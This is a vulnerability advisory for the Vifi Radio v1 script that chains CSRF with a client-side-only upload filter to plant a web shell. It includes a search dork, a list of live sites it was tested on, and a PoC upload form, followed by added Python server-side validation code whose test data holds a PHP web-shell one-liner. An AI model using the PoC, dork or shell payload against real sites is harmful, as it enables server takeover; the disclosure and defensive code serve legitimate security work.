Vifi Radio 1 Shell Upload / CSRF

2015.08.24
Credit: KnocKout
Risk: High
Local: No
Remote: Yes
CVE: N/A

Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF
(advisory by KnocKout, http://h4x0resec.blogspot.com)

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker, Oguz Dokumaci ( d4rkvisuaL ), Septemb0x, KedAns-Dz, indushka, Kalashinkov
############################################################

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html
|~Official Demo : http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################

Tested on:
http://radyo.vifibilisim.com
www.radyoimza.com
www.bayraklifm.com
www.istanbulfm.net
www.gaziantepfurkanradyo.com
http://iskenderunfm.com

----------------------------------------------------------
INFO : The CSRF vulnerability previously discovered in this script is used first: the admin password is changed through it and the attacker logs in to the panel (/yonetim). The DJ image upload form (djtek_yukle.asp) restricts uploads only through the client-side onSubmit extension check reproduced in the PoC below (GIF, JPG, JPEG, BMP, PNG). When the PoC form is submitted and the request is edited in transit with "Tamper Data", that filter is bypassed and a web shell can be uploaded straight to the server. Tamper Data already shows the server's response during the transfer, which reveals where the uploaded shell was stored; alternatively, the file can be traced from the "DJler" (DJs) section at the bottom of the "Anasayfa" (home page). The stored file keeps the submitted extension, so the shell ends up under /yonetim/djler/ with a server-executable name, as in the example below.
Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php

----------------------------------------------------------
Upload.HTML
-----------------------------------------------------------
<!-- PoC page: hosted by the attacker and submitted while logged in to the
     target panel. The onSubmit handler is the target's own client-side
     extension check (GIF,JPG,JPEG,BMP,PNG); checkFileUpload is not defined
     on this page and the request is edited in transit with Tamper Data, so
     the check does not limit what reaches djtek_yukle.asp. -->
<html>
<body>
<form name="form1" method="post"
      action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56"
      enctype="multipart/form-data"
      onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td class="baslik">CSRF with Tamper Data Shell Upload PoC</td>
    </tr>
    <tr>
      <td height="125" align="center" class="menu">
        <input type="file" name="fmfile" style="width:200px" class="main">
        <input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" />
      </td>
    </tr>
  </table>
</form>
</body>
</html>

############################
"Admin Panel: /yonetim "
############################
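The weakness the advisory exploits is that the upload filter runs only in the browser, so anything edited after the onSubmit check (with Tamper Data or any intercepting proxy) reaches djtek_yukle.asp unchecked, and the server stores the file under the extension the client chose. The block below is an added example, not code from the advisory or from the Vifi Radio script, and it is written in Python rather than the script's own classic ASP. It shows the server-side validation such a handler needs: the same allowlist re-checked on the server, the stored extension derived from the file's magic bytes instead of the submitted name, a server-generated filename, and a CSRF token check so the request cannot be forced through a logged-in admin's session. The function names, the token handling, the handler signature and the sample uploads are assumptions; the sample files are constructed inline.

```python
"""Server-side upload validation of the kind the advisory shows to be missing.

Added example, not code from the advisory or the Vifi Radio script, and written
in Python rather than the script's classic ASP. Assumptions: the handler receives
the multipart part as (filename, content_type, data), the admin session holds a
CSRF token, and accepted files go under /yonetim/djler/ as in the advisory.
"""
import hmac
import secrets
import time
from typing import Optional

# Same allowlist as the form's onSubmit check checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG'),
# but enforced where an intercepting proxy cannot edit it away.
ALLOWED_EXT = {"gif", "jpg", "jpeg", "bmp", "png"}

# Magic bytes per format. The extension written to disk comes from this table,
# never from the client-supplied filename or Content-Type.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "bmp": (b"BM",),
}

UPLOAD_DIR = "/yonetim/djler"  # where the advisory's example shell was found


class UploadRejected(ValueError):
    """Raised for any upload that must not reach disk."""


def client_ext(filename: str) -> str:
    """Extension as the attacker chose it: 'shell.php', 'x.PNG.', 'dir/a.jpg'."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].rstrip(". ")
    if "." not in base:
        return ""
    ext = base.rsplit(".", 1)[-1].lower()
    return "jpg" if ext == "jpeg" else ext


def sniff_format(data: bytes) -> Optional[str]:
    """Format implied by the first bytes of the body, or None for non-images."""
    for fmt, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return fmt
    return None


def validate_upload(filename: str, content_type: str, data: bytes,
                    csrf_token: Optional[str], session_token: Optional[str]) -> str:
    """Return the server-side path to store `data` at, or raise UploadRejected.

    `content_type` is accepted for signature parity with a real handler but
    deliberately ignored: it is attacker-controlled, just like the filename.
    """
    # 1. CSRF: an upload is a state change, so it must carry the session's token.
    if not (csrf_token and session_token
            and hmac.compare_digest(csrf_token, session_token)):
        raise UploadRejected("missing or invalid CSRF token")

    # 2. Extension allowlist, repeated on the server because the JavaScript
    #    check ran in the attacker's browser (or not at all).
    ext = client_ext(filename)
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")

    # 3. The body must actually be an image of the claimed type. A PHP or ASP
    #    file renamed to .png fails here; a GIF renamed to .png fails too,
    #    because a mismatch means the client lied about something.
    fmt = sniff_format(data)
    if fmt is None:
        raise UploadRejected("body does not start with a known image signature")
    if fmt != ext:
        raise UploadRejected(f"body is {fmt} but filename claims {ext}")

    # 4. Server-generated name: timestamp plus random suffix, with the extension
    #    taken from the sniffed format. The advisory's 2082015121530.php shows what
    #    happens when the submitted extension is kept instead.
    stored = f"{int(time.time())}_{secrets.token_hex(8)}.{fmt}"
    return f"{UPLOAD_DIR}/{stored}"


def try_upload(filename: str, content_type: str, data: bytes,
               csrf_token: Optional[str], session_token: Optional[str]) -> Optional[str]:
    """Convenience wrapper: stored path on success, None when rejected."""
    try:
        return validate_upload(filename, content_type, data, csrf_token, session_token)
    except UploadRejected:
        return None


if __name__ == "__main__":
    # Constructed sample uploads (not captured from any real site).
    token = secrets.token_hex(16)
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    php = b"<?php system($_GET['c']); ?>"
    print("legit png     ->", try_upload("dj.png", "image/png", png, token, token))
    print("renamed shell ->", try_upload("shell.php", "image/png", png, token, token))
    print("php as .png   ->", try_upload("shell.png", "image/png", php, token, token))
    print("no csrf token ->", try_upload("dj.png", "image/png", png, None, token))
```

The decisive step is the last one: even if an attacker gets a file past the allowlist, the name on disk is chosen by the server and its extension comes from the sniffed format, so the path the advisory's example shows (a timestamp-style name ending in .php) cannot be produced. The same token check belongs on the admin password-change form, since the advisory uses CSRF against that form to obtain the session in the first place; keeping the upload directory non-executable in the web server configuration is a further layer that this example does not cover.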
Copyright 2024, cxsecurity.com